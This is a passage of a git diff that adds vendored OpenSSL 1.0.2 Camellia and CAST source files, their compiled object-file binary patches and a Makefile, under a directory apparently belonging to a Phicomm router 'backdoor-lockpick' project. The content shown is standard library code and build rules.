+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#ifndef HEADER_CAMELLIA_LOCL_H
+# define HEADER_CAMELLIA_LOCL_H
+
+typedef unsigned int u32;
+typedef unsigned char u8;
+
+int Camellia_Ekeygen(int keyBitLength, const u8 *rawKey,
+                     KEY_TABLE_TYPE keyTable);
+void Camellia_EncryptBlock_Rounds(int grandRounds, const u8 plaintext[],
+                                  const KEY_TABLE_TYPE keyTable,
+                                  u8 ciphertext[]);
+void Camellia_DecryptBlock_Rounds(int grandRounds, const u8 ciphertext[],
+                                  const KEY_TABLE_TYPE keyTable,
+                                  u8 plaintext[]);
+void Camellia_EncryptBlock(int keyBitLength, const u8 plaintext[],
+                           const KEY_TABLE_TYPE keyTable, u8 ciphertext[]);
+void Camellia_DecryptBlock(int keyBitLength, const u8 ciphertext[],
+                           const KEY_TABLE_TYPE keyTable, u8 plaintext[]);
+int private_Camellia_set_key(const unsigned char *userKey, const int bits,
+                             CAMELLIA_KEY *key);
+#endif                          /* #ifndef HEADER_CAMELLIA_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.c
new file mode 100644
index 0000000..cbd2502
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.c
@@ -0,0 +1,80 @@
+/* crypto/camellia/camellia_misc.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+#include <openssl/camellia.h>
+#include "cmll_locl.h"
+
+const char CAMELLIA_version[] = "CAMELLIA" OPENSSL_VERSION_PTEXT;
+
+int private_Camellia_set_key(const unsigned char *userKey, const int bits,
+                             CAMELLIA_KEY *key)
+{
+    if (!userKey || !key)
+        return -1;
+    if (bits != 128 && bits != 192 && bits != 256)
+        return -2;
+    key->grand_rounds = Camellia_Ekeygen(bits, userKey, key->u.rd_key);
+    return 0;
+}
+
+void Camellia_encrypt(const unsigned char *in, unsigned char *out,
+                      const CAMELLIA_KEY *key)
+{
+    Camellia_EncryptBlock_Rounds(key->grand_rounds, in, key->u.rd_key, out);
+}
+
+void Camellia_decrypt(const unsigned char *in, unsigned char *out,
+                      const CAMELLIA_KEY *key)
+{
+    Camellia_DecryptBlock_Rounds(key->grand_rounds, in, key->u.rd_key, out);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.o
new file mode 100644
index 0000000000000000000000000000000000000000..00ccb3f5bf811a1e8b97e8c246bc9f09712c2fa9
GIT binary patch
literal 2192
zcmbu9&rcIU6vwAjr7F~-#*kplo{UD>v{fSzH2q<rm_-PMlZngH4p3=#o82j)X#A0e
z!$uDt`4_x-G{i&_660BKo;+&2NIYnap}yChX_sYt(U)xB%xAvu&Fs8=eVkFox&i?r
zEI@9O_DoPhB8S`KM01!RVbV)}oH+M;!v2-rXt2>-{e2^Af6Q)tV6y$){#pP0_Qn&?
zvfkHwjYi|?9%ind%G#e4``s5zV%H;pV%v9jAasZ4dbWiyYwv>UE2=tiTuUb>Gm0{i
zlq#CZBx6yUs!%<bQ>2(2mE%%8F5T92DISeoBV;_C9+580EmU<@m4@Xja&$0uz1p0{
z9>t?_^y)<iL*7I1MBu^K9=|h3x(L}u7K8`wwBtx%eTD?qB7uRP?$8T3c0cg5d`&?=
z8IIJu*2AIXPBY&SUqc-l=4tA{3x>Rt!4`0~-G<+K(6@4UW^wBMQNiY0?q@g)Hs9Kh
zcOQgJeW(LJ+JPTAz<Yt5be&(^$$8*d2d|9+@Z*!fF^`BBcY3db{sGq)z@rKMa~S*O
ze+j(Lbw8Id2rXYOmDF<4%FB6DF^j7jqiR|!(^9FZsTO7G3at@!T$xHG6?JNCESH&8
zXOk%<qmq^^1DYkOw*l4jX05{7Ame~k$;hv$Ge%V}Snb6E^{8(-V85C-jJirqt7z!X
z>B$K9_>K3#^9LFhZQjMhF23gCcuztvaSr{0J<~F*7n<OrKGP0vaZv{%TeULN7Qi#p
z@ylXl(vl`Ky2glH(3nQ#1<N9`X*iR-Q7%&*)^vkW8G3inVp@KM&zJP7TrrIbHCYW}
zFcV!?7fq-XKgs_&3Bs{Qy<d0&7}`U}wSH0SwgH%64H9k$;}AlytmDXW@E9vPPkgu7
zFUY+e{|1<!dH25zBFy=(@iB<SobKAglx*V<SgT*0DUrArZWsm_9~FT6Z`^z1#rcI#
zfliFwDbDyoAMFe<{Fn2dzn{lTu;w;#|AO6z0ZP5`Lp*+72)Xyh<5%cc|7oB4<G-tj
x7xnks8@Jlz`@iBId;FMBJm&P)9uUcLxP=p!@pLWH2P41uO@4mXQaS@~{9pZ@@xTB8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.c
new file mode 100644
index 0000000..46c3ae2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.c
@@ -0,0 +1,122 @@
+/* crypto/camellia/camellia_ofb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/camellia.h>
+#include <openssl/modes.h>
+
+/*
+ * The input and output encrypted as though 128bit ofb mode is being used.
+ * The extra state information to record how much of the 128bit block we have
+ * used is contained in *num;
+ */
+void Camellia_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const CAMELLIA_KEY *key,
+                             unsigned char *ivec, int *num)
+{
+    CRYPTO_ofb128_encrypt(in, out, length, key, ivec, num,
+                          (block128_f) Camellia_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.o
new file mode 100644
index 0000000000000000000000000000000000000000..b9ee12ce73550190dbbd354ec8634e5d9baf958c
GIT binary patch
literal 1656
zcmbtTKX21e5I@(276@sI7$OxR4+w#vPe}_RbU<mN`~f0@N-C8BS$1$K!cHRRMQRuT
zDGMVXgOQJb1Op#~k%0xVA*66;ziXU_v%pE`yZiZmcjx!cudB`4f?)uQ0e4^;F$z#J
zr+ztd%WxJl@N?zjug3U$ZgP{rZ}e!4Kj%L|y;9k-uI#zPt{hso#il5%7jF%tu=r}D
zAPP6G#xPL;7EyDkCs6AT_Fw_vBVpY3Jo+TY%Uv*za>iO_Y55%vdI2#~k~}>c*?cW)
z-OVmjFkk2!7vaYwEyGMb0h)!UnPr*L^s^X6CY<~mjPRv7c>2(0bSkry42I_tb4K5e
z*d<gtM_slMNW<^X!J!lQzTG=;MF%QQ;Q9V@hr;4U$@aRPaMYJz*PE@K?WWzT)gD#b
zc6)oLS+%FxoL1R={IK29$!fsU%AP`d2KDzOmKBB54$!wUZYdo1gLY&pVlWD%<ANB-
zFt&&6g`V#S=^aTBPaWxia0deron8=lUBtRQ=?UDq^?`IcFI4=jI~4t}*Y`p>0ufd4
z4()>wk7C;MKRgS$w1fJFlo2E0`;4PFmwmEpsB|`E)TF#ohf+`=oiFv_&EmS36|Qge
zzT)YIY9!@422}H3`9<VXO`a3oNVxws29)LgY-yj_Po|EOLBiK_@8LW83ukr+<F|@q
zDa(e>k7E}ds;TqetAr9KDy#FKAf9%AA5=lUC%Ql4GN19Z-qh+VJy1&OgXy25e@o{R
frr#YxkXQX33KF8q9V4sgrSZQgzJHt<J39XliJpJ|

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.c
new file mode 100644
index 0000000..d19ee19
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.c
@@ -0,0 +1,64 @@
+/* crypto/camellia/cmll_utl.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+#include <openssl/camellia.h>
+#include "cmll_locl.h"
+
+int Camellia_set_key(const unsigned char *userKey, const int bits,
+                     CAMELLIA_KEY *key)
+{
+#ifdef OPENSSL_FIPS
+    fips_cipher_abort(Camellia);
+#endif
+    return private_Camellia_set_key(userKey, bits, key);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.o
new file mode 100644
index 0000000000000000000000000000000000000000..59e1f514a7df1f4c61948d354e92a440f2cad09a
GIT binary patch
literal 1544
zcmbtTUuzRV5T9$Rts1cwAB2h=K1lu3C9#57L9Pu+P=W<*!53LB>1s>wl5n>ti4Xb}
zeDve^*pH%*;+qI{=5{CDE>|CPU@|kmo8Qdr?B-Lu*O?0fU<u$UoJ5QQ9L=5hQRzl-
z8S3!!%FSQj%edQWZG@}4{bHz#@Ud7IjkV^Zq70iKA2dYc;T;2)+4K0jgnACO`(hWc
z{8z$is3g~nf#AbS2qsIxN_}DRGY&@h4g2kawSO~omU;MbT$NL+JSok<Q=Deiuu_%O
z;CvN~RTj>`7tg?H8>i(ihRe>JeC9ghv_D^NAy9?GAWafk=tK-ac6-}fn?1SR>AY(1
z$eqotUR%OAJ9r;!C0lW-lH?$kxzh4bO-%=$j5cry_4l!n(0r!*E7gVoBA=!@?xWS2
zvHR?0Dv5<w6AfZ7)-i~Fo`V>S(o_u*8;-OR_$JnJ9S;s|{BBr?aW)#OOiw|S71X|b
zo8hptmjB~~NT#>q-(-Xs3GdxRCYOD(E2y-a2-THUS`5l{W8flM>ccO9@!J;nU*0pz
z^9|K-<vs>f^I!Q*<WkKBsw>?8o(rPS{n>6fn47BI!10;K&~tR?-(uIrFifl$&Jg49
z{uu6~Lp6Q=7n|Up%jdtrysG<)D(;WC%;)>7>P@YW=m#aV2d4iHy(OPdn16Q&!8gl$
XLV+U|o*`G!tKz@5^Cz=R<M{kP=$m6Q

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile
new file mode 100644
index 0000000..f3f4859
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile
@@ -0,0 +1,102 @@
+#
+# OpenSSL/crypto/cast/Makefile
+#
+
+DIR=	cast
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CAST_ENC=c_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=casttest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=c_skey.c c_ecb.c c_enc.c c_cfb64.c c_ofb64.c 
+LIBOBJ=c_skey.o c_ecb.o $(CAST_ENC) c_cfb64.o c_ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= cast.h
+HEADER=	cast_s.h cast_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+cast-586.s:	asm/cast-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL)	asm/cast-586.pl $(PERLASM_SCHEME) $(CLAGS) $(PROCESSOR) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+c_cfb64.o: ../../e_os.h ../../include/openssl/cast.h
+c_cfb64.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_cfb64.o: c_cfb64.c cast_lcl.h
+c_ecb.o: ../../e_os.h ../../include/openssl/cast.h
+c_ecb.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_ecb.o: ../../include/openssl/opensslv.h c_ecb.c cast_lcl.h
+c_enc.o: ../../e_os.h ../../include/openssl/cast.h
+c_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_enc.o: c_enc.c cast_lcl.h
+c_ofb64.o: ../../e_os.h ../../include/openssl/cast.h
+c_ofb64.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_ofb64.o: c_ofb64.c cast_lcl.h
+c_skey.o: ../../e_os.h ../../include/openssl/cast.h
+c_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+c_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_skey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+c_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+c_skey.o: c_skey.c cast_lcl.h cast_s.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.bak
new file mode 100644
index 0000000..f3f4859
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.bak
@@ -0,0 +1,102 @@
+#
+# OpenSSL/crypto/cast/Makefile
+#
+
+DIR=	cast
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CAST_ENC=c_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=casttest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=c_skey.c c_ecb.c c_enc.c c_cfb64.c c_ofb64.c 
+LIBOBJ=c_skey.o c_ecb.o $(CAST_ENC) c_cfb64.o c_ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= cast.h
+HEADER=	cast_s.h cast_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+cast-586.s:	asm/cast-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL)	asm/cast-586.pl $(PERLASM_SCHEME) $(CLAGS) $(PROCESSOR) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+c_cfb64.o: ../../e_os.h ../../include/openssl/cast.h
